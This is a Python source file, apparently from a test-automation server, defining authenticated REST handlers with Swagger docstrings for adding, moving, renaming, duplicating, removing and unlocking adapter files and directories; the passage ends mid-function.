a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 5
|
2020-10-27T15:05:12.000Z
|
2021-12-13T13:48:11.000Z
|
src/ea/servercontrols/RestTesterFunctions.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 2
|
2019-10-01T06:12:06.000Z
|
2020-04-29T13:28:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------
# Copyright (c) 2010-2021 Denis Machard
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -------------------------------------------------------------------
from pycnic.core import Handler
from pycnic.errors import HTTP_401, HTTP_400, HTTP_500, HTTP_403, HTTP_404
import os
import json
import wrapt
import yaml
from ea.libs import Settings
from ea.serverengine import (Context,
ProjectsManager,
TaskManager,
AgentsManager,
VariablesManager
)
from ea.serverrepositories import (RepoAdapters,
RepoTests,
RepoPublic,
RepoArchives)
from ea.libs.FileModels import TestSuite as TestSuite
from ea.libs.FileModels import TestUnit as TestUnit
from ea.libs.FileModels import TestPlan as TestPlan
class EmptyValue(Exception):
    """Raised when a required field is missing or empty in a request payload."""
class HandlerCORS(Handler):
    """Base handler that answers CORS preflight OPTIONS requests."""
    def options(self):
        # Empty JSON body for OPTIONS; CORS headers are presumably added by
        # the surrounding framework/WSGI layer -- TODO confirm.
        return {}
@wrapt.decorator
def _to_yaml(wrapped, instance, args, kwargs):
    """
    New in v17: marker decorator for handler methods whose docstrings feed
    the YAML/Swagger documentation generator. At call time it is a pure
    pass-through -- the wrapped method is invoked unchanged.
    """
    return wrapped(*args, **kwargs)
def _get_user(request):
    """
    Resolve the authenticated user for the given request.

    Lookup order:
      1. the ``session_id`` cookie, matched against the Context's sessions;
      2. otherwise the ``Authorization`` header (basic auth, new in v17).

    @param request: the pycnic request object.
    @return: the authenticated user's profile.
    @raise HTTP_401: missing/invalid credentials or unknown session.
    """
    sess_id = request.cookies.get("session_id")
    if sess_id is None:
        # new in v17, checking authorization header
        authorization = request.get_header(name="Authorization", default=None)
        if authorization is not None:
            userP = Context.instance().apiBasicAuthorization(authorization=authorization)
            if userP is None:
                raise HTTP_401("Invalid credentials")
            else:
                return userP
        else:
            raise HTTP_401("Authorization header not detected")
        # end of new
    else:
        if sess_id in Context.instance().getSessions():
            return Context.instance().getSessions()[sess_id]
        else:
            raise HTTP_401("Invalid session")
def _check_project_permissions(user_login, project_id):
    """
    Verify that `user_login` is authorized to access project `project_id`.

    @param user_login: login name of the requesting user.
    @param project_id: project identifier; anything convertible to int.
    @raise HTTP_400: if project_id cannot be converted to an integer.
    @raise HTTP_403: if the user has no permission on this project.
    """
    try:
        project_id = int(project_id)
    # Narrowed catch: only conversion failures should map to HTTP 400.
    # The original `except BaseException` also swallowed SystemExit and
    # KeyboardInterrupt, turning interpreter shutdown into a 400 response.
    except (TypeError, ValueError):
        raise HTTP_400(
            "Bad project id (Id=%s) provided in request, int expected" %
            str(project_id))
    # get the project id according to the name and checking permissions
    project_authorized = ProjectsManager.instance().checkProjectsAuthorization(user=user_login,
                                                                               projectId=project_id)
    if not project_authorized:
        raise HTTP_403('Permission denied to this project')
class AdaptersCheckSyntax(Handler):
    """
    /rest/adapters/check/syntax

    NOTE(review): unlike the other handlers below, this one extends Handler
    (no CORS OPTIONS support) and performs no _get_user authentication
    check -- confirm both are intentional.
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: check the syntax of a adapter
        description: ''
        operationId: adaptersCheckSyntax
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ file-content ]
              properties:
                file-content:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                success:
                  type: boolean
                syntax-error:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/check/syntax",
                  "file-content": "...."
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # validate the JSON payload: file content is mandatory
        try:
            fileContent = self.request.data.get("file-content")
            if fileContent is None:
                raise EmptyValue("Please specify a file content")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # delegate the actual syntax check to the adapters repository
        success, syntaxerror = RepoAdapters.instance().checkSyntax(content=fileContent)
        return {"cmd": self.request.path,
                "success": success,
                "syntax-error": syntaxerror}
class AdaptersAdapterAdd(HandlerCORS):
    """
    /rest/adapters/adapter/add
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Add a new adapter
        description: ''
        operationId: adaptersAdapterAdd
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              properties:
                package-name:
                  type: string
                adapter-name:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/adapter/add",
                  "message": "adapter added"
                }
          '400':
            description: Bad request provided
          '401':
            description: unauthorized
        """
        # authenticated, non-monitor users only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # validate the JSON payload
        try:
            packageName = self.request.data.get("package-name")
            if packageName is None:
                raise EmptyValue("Please specify a package name")
            adapterName = self.request.data.get("adapter-name")
            if adapterName is None:
                raise EmptyValue("Please specify a adapter name")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # create the adapter skeleton in the repository
        success = RepoAdapters.instance().addAdapter(pathFolder=packageName,
                                                     adapterName=adapterName,
                                                     mainAdapters=False)
        if success != Context.instance().CODE_OK:
            raise HTTP_500("Unable to add adapter")
        return {"cmd": self.request.path, "message": "adapter added"}
class AdaptersListing(HandlerCORS):
    """
    /rest/adapters/listing
    """
    @_to_yaml
    def get(self):
        """
        tags:
          - adapters
        summary: Get the listing of all adapters.
        description: ''
        operationId: adaptersListing
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
        responses:
          '200':
            description: adapters listing
            schema :
              properties:
                cmd:
                  type: string
                adapters-listing:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/listing",
                  "adapters-listing": "...."
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # NOTE(review): authentication is commented out, so this endpoint is
        # reachable without a session -- confirm this is intentional.
        # user_profile = _get_user(request=self.request)
        _, _, listing, _ = RepoAdapters.instance().getTree()
        return {"cmd": self.request.path, "adapters-listing": listing}
class AdaptersFileMove(HandlerCORS):
    """
    /rest/adapters/file/move
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Move file
        description: ''
        operationId: adaptersFileMove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ file-name, file-path, file-extension ]
                  properties:
                    file-name:
                      type: string
                    file-path:
                      type: string
                    file-extension:
                      type: string
                destination:
                  type: object
                  required: [ file-path ]
                  properties:
                    file-path:
                      type: string
        responses:
          '200':
            description: move response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/move",
                  "message": "file successfully moved"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # authenticated, non-monitor users only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # validate the JSON payload
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            filePath = self.request.data.get("source")["file-path"]
            if filePath is None:
                # fixed: this message previously said "filename" for the
                # file-path field (swapped with the check below)
                raise EmptyValue("Please specify a source file path")
            fileName = self.request.data.get("source")["file-name"]
            if fileName is None:
                # fixed: this message previously said "file path" for the
                # file-name field
                raise EmptyValue("Please specify a source filename")
            fileExt = self.request.data.get("source")["file-extension"]
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newFilePath = self.request.data.get("destination")["file-path"]
            if newFilePath is None:
                raise EmptyValue("Please specify a destination file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        newFilePath = os.path.normpath("/" + newFilePath)
        # delegate the move to the adapters repository and map error codes
        success = RepoAdapters.instance().moveFile(
            mainPath=filePath,
            fileName=fileName,
            extFilename=fileExt,
            newPath=newFilePath
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to move file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Move file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")
        return {"cmd": self.request.path, "message": "file successfully moved"}
class AdaptersDirectoryMove(HandlerCORS):
    """
    /rest/adapters/directory/move
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Move directory
        description: ''
        operationId: adaptersDirectoryMove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ directory-name, directory-path ]
                  properties:
                    directory-name:
                      type: string
                    directory-path:
                      type: string
                destination:
                  type: object
                  required: [ directory-path ]
                  properties:
                    directory-path:
                      type: string
        responses:
          '200':
            description: move response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/directory/move",
                  "message": "directory successfully moved"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # get the user profile
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # checking json request on post
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            folderName = self.request.data.get("source")["directory-name"]
            if folderName is None:
                raise EmptyValue("Please specify a source folder name")
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newFolderPath = self.request.data.get(
                "destination")["directory-path"]
            if newFolderPath is None:
                raise EmptyValue("Please specify a destination folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # some security check to avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)
        newFolderPath = os.path.normpath("/" + newFolderPath)
        # refuse a no-op move onto itself
        if "%s/%s" % (folderPath, folderName) == newFolderPath:
            raise HTTP_403("Destination same as origin")
        # all ok, do the duplication
        success = RepoAdapters.instance().moveDir(
            mainPath=folderPath,
            folderName=folderName,
            newPath=newFolderPath
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to move directory")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500(
                "Unable to move directory: source directory not found")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")
        return {"cmd": self.request.path,
                "message": "directory successfully moved"}
class AdaptersFileRename(HandlerCORS):
    """
    /rest/adapters/file/rename
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Rename file in the adapters storage
        description: ''
        operationId: adaptersFileRename
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, file-name, file-path, file-extension ]
                  properties:
                    project-id:
                      type: integer
                    file-name:
                      type: string
                    file-path:
                      type: string
                    file-extension:
                      type: string
                destination:
                  type: object
                  required: [ project-id, file-name ]
                  properties:
                    project-id:
                      type: integer
                    file-name:
                      type: string
        responses:
          '200':
            description: rename response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/rename",
                  "message": "file successfully renamed"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # authenticated, non-monitor users only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # validate the JSON payload
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            fileName = self.request.data.get("source")["file-name"]
            if fileName is None:
                raise EmptyValue("Please specify a source filename")
            filePath = self.request.data.get("source")["file-path"]
            if filePath is None:
                raise EmptyValue("Please specify a source file path")
            fileExt = self.request.data.get("source")["file-extension"]
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newFileName = self.request.data.get("destination")["file-name"]
            if newFileName is None:
                raise EmptyValue("Please specify a destination file name")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        success = RepoAdapters.instance().renameFile(
            mainPath=filePath,
            oldFilename=fileName,
            newFilename=newFileName,
            extFilename=fileExt
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to rename file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Rename file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")
        # fixed: message previously misspelled "sucessfully", contradicting
        # the documented response above
        return {"cmd": self.request.path, "message": "file successfully renamed",
                "file-path": filePath,
                "file-name": fileName,
                "file-extension": fileExt,
                "new-file-name": newFileName}
class AdaptersDirectoryRename(HandlerCORS):
    """
    /rest/adapters/directory/rename
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Rename directory in the adapters storage
        description: ''
        operationId: adaptersDirectoryRename
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, directory-name, directory-path ]
                  properties:
                    project-id:
                      type: integer
                    directory-name:
                      type: string
                    directory-path:
                      type: string
                destination:
                  type: object
                  required: [ project-id, directory-name ]
                  properties:
                    project-id:
                      type: integer
                    directory-name:
                      type: string
        responses:
          '200':
            description: rename response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/directory/rename",
                  "message": "directory successfully renamed"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # authenticated, non-monitor users only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # validate the JSON payload
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            folderName = self.request.data.get("source")["directory-name"]
            if folderName is None:
                raise EmptyValue("Please specify a source folder name")
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newFolderName = self.request.data.get(
                "destination")["directory-name"]
            if newFolderName is None:
                raise EmptyValue("Please specify a destination folder name")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)
        # NOTE(review): renameDir receives directory *names* via its
        # oldPath/newPath parameters -- presumably resolved against mainPath
        # by the repository; confirm against RepoAdapters.renameDir.
        success = RepoAdapters.instance().renameDir(mainPath=folderPath, oldPath=folderName,
                                                    newPath=newFolderName)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to rename directory")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500(
                "Unable to rename directory: source directory not found")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")
        return {"cmd": self.request.path, "message": "directory successfully renamed",
                "directory-name": folderName, "directory-path": folderPath,
                "new-directory-name": newFolderName}
class AdaptersFileDuplicate(HandlerCORS):
    """
    /rest/adapters/file/duplicate
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Duplicate file in the adapters storage
        description: ''
        operationId: adaptersFileDuplicate
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, file-name, file-path, file-extension ]
                  properties:
                    project-id:
                      type: integer
                    file-name:
                      type: string
                    file-path:
                      type: string
                    file-extension:
                      type: string
                destination:
                  type: object
                  required: [ project-id, file-name ]
                  properties:
                    project-id:
                      type: integer
                    file-name:
                      type: string
        responses:
          '200':
            description: duplicate response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/duplicate",
                  "message": "file successfully duplicated"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # authenticated, non-monitor users only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # validate the JSON payload
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            fileName = self.request.data.get("source")["file-name"]
            if fileName is None:
                raise EmptyValue("Please specify a source filename")
            filePath = self.request.data.get("source")["file-path"]
            if filePath is None:
                raise EmptyValue("Please specify a source file path")
            fileExt = self.request.data.get("source")["file-extension"]
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newFileName = self.request.data.get("destination")["file-name"]
            if newFileName is None:
                raise EmptyValue("Please specify a destination file name")
            newFilePath = self.request.data.get("destination")["file-path"]
            if newFilePath is None:
                raise EmptyValue("Please specify a destination file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        newFilePath = os.path.normpath("/" + newFilePath)
        success = RepoAdapters.instance().duplicateFile(
            mainPath=filePath,
            oldFilename=fileName,
            newFilename=newFileName,
            extFilename=fileExt,
            newMainPath=newFilePath
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to duplicate file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Duplicate file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")
        # fixed: message previously misspelled "sucessfully"; swagger example
        # above previously showed the rename endpoint (copy-paste)
        return {"cmd": self.request.path,
                "message": "file successfully duplicated"}
class AdaptersDirectoryDuplicate(HandlerCORS):
    """
    /rest/adapters/directory/duplicate
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Duplicate directory in the adapters storage
        description: ''
        operationId: adaptersDirectoryDuplicate
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ directory-name, directory-path ]
                  properties:
                    directory-name:
                      type: string
                    directory-path:
                      type: string
                destination:
                  type: object
                  required: [ directory-name ]
                  properties:
                    directory-name:
                      type: string
                    directory-path:
                      type: string
        responses:
          '200':
            description: duplicate response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/directory/duplicate",
                  "message": "directory successfully duplicated"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # get the user profile
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # checking json request on post
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            folderName = self.request.data.get("source")["directory-name"]
            if folderName is None:
                raise EmptyValue("Please specify a source folder name")
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newFolderName = self.request.data.get(
                "destination")["directory-name"]
            if newFolderName is None:
                raise EmptyValue("Please specify a destination folder name")
            newFolderPath = self.request.data.get(
                "destination")["directory-path"]
            if newFolderPath is None:
                raise EmptyValue("Please specify a destination folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # some security check to avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)
        newFolderPath = os.path.normpath("/" + newFolderPath)
        # all ok, do the duplication
        success = RepoAdapters.instance().duplicateDir(
            mainPath=folderPath,
            oldPath=folderName,
            newPath=newFolderName,
            newMainPath=newFolderPath
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to duplicate directory")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500(
                "Unable to duplicate directory: source directory not found")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")
        return {"cmd": self.request.path,
                "message": "directory successfully duplicated"}
class AdaptersFileRemove(HandlerCORS):
    """
    /rest/adapters/file/remove
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: remove file in the adapters storage
        description: ''
        operationId: adaptersFileRemove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ file-path ]
              properties:
                file-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/remove",
                  "message": "file successfully removed"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # monitor accounts are read-only: refuse any destructive call
        profile = _get_user(request=self.request)
        if profile['monitor']:
            raise HTTP_403("Access refused")

        # validate the json payload
        try:
            file_path = self.request.data.get("file-path")
            if not file_path:
                raise EmptyValue("Please specify a file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # re-anchor the path on the repository root to block directory traversal
        file_path = os.path.normpath("/" + file_path)

        rc = RepoAdapters.instance().delFile(pathFile=file_path)

        # translate repository return codes into HTTP errors
        ctx = Context.instance()
        if rc == ctx.CODE_ERROR:
            raise HTTP_500("Unable to remove file")
        elif rc == ctx.CODE_FAILED:
            raise HTTP_403("Remove file denied")
        elif rc == ctx.CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")

        return {"cmd": self.request.path,
                "message": "file successfully removed"}
class AdaptersFileUnlock(HandlerCORS):
    """
    /rest/adapters/file/unlock
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: unlock file in the adapters storage
        description: ''
        operationId: adaptersFileUnlock
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ file-path, file-name, file-extension  ]
              properties:
                file-path:
                  type: string
                file-name:
                  type: string
                file-extension:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/unlock",
                  "message": "file successfully unlocked"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # validate the json payload: all three file coordinates are mandatory
        payload = self.request.data
        try:
            path_file = payload.get("file-path")
            if path_file is None:
                raise EmptyValue("Please specify a source filepath")
            name_file = payload.get("file-name")
            if name_file is None:
                raise EmptyValue("Please specify a source file filename")
            ext_file = payload.get("file-extension")
            if ext_file is None:
                raise EmptyValue("Please specify a source file extension")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # release the lock held by this user on the adapter file
        rc = RepoAdapters.instance().unlockFile(pathFile=path_file,
                                                nameFile=name_file,
                                                extFile=ext_file,
                                                login=user_profile["login"])
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to unlock adapter file")

        return {"cmd": self.request.path,
                "message": "file successfully unlocked"}
class AdaptersDirectoryRemove(HandlerCORS):
    """
    /rest/adapters/directory/remove
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: remove directory in the adapters storage
        description: ''
        operationId: adaptersDirectoryRemove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ directory-path ]
              properties:
                directory-path:
                  type: string
                recursive:
                  type: boolean
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/directory/remove",
                  "message": "directory successfully removed"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # monitor accounts may not delete anything
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        # validate the json payload
        try:
            folder_path = self.request.data.get("directory-path")
            if folder_path is None:
                raise EmptyValue("Please specify a source folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # re-anchor the path on the repository root to block directory traversal
        folder_path = os.path.normpath("/" + folder_path)

        rc = RepoAdapters.instance().delDir(folder_path)

        # map repository return codes onto HTTP errors
        ctx = Context.instance()
        if rc == ctx.CODE_ERROR:
            raise HTTP_500("Unable to remove directory")
        if rc == ctx.CODE_NOT_FOUND:
            raise HTTP_500("Unable to remove directory (missing)")
        if rc == ctx.CODE_FORBIDDEN:
            raise HTTP_403("Cannot remove directory")

        return {"cmd": self.request.path,
                "message": "directory successfully removed"}
class AdaptersDirectoryAdd(HandlerCORS):
    """
    /rest/adapters/directory/add
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Add directory in the adapters storage
        description: ''
        operationId: adaptersDirectoryAdd
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ directory-name, directory-path ]
              properties:
                directory-name:
                  type: string
                directory-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/directory/add",
                  "message": "directory successfully added"
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # monitor accounts may not modify the storage
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        # validate the json payload: both name and parent path are mandatory
        payload = self.request.data
        try:
            folder_name = payload.get("directory-name")
            if folder_name is None:
                raise EmptyValue("Please specify a source folder name")
            folder_path = payload.get("directory-path")
            if folder_path is None:
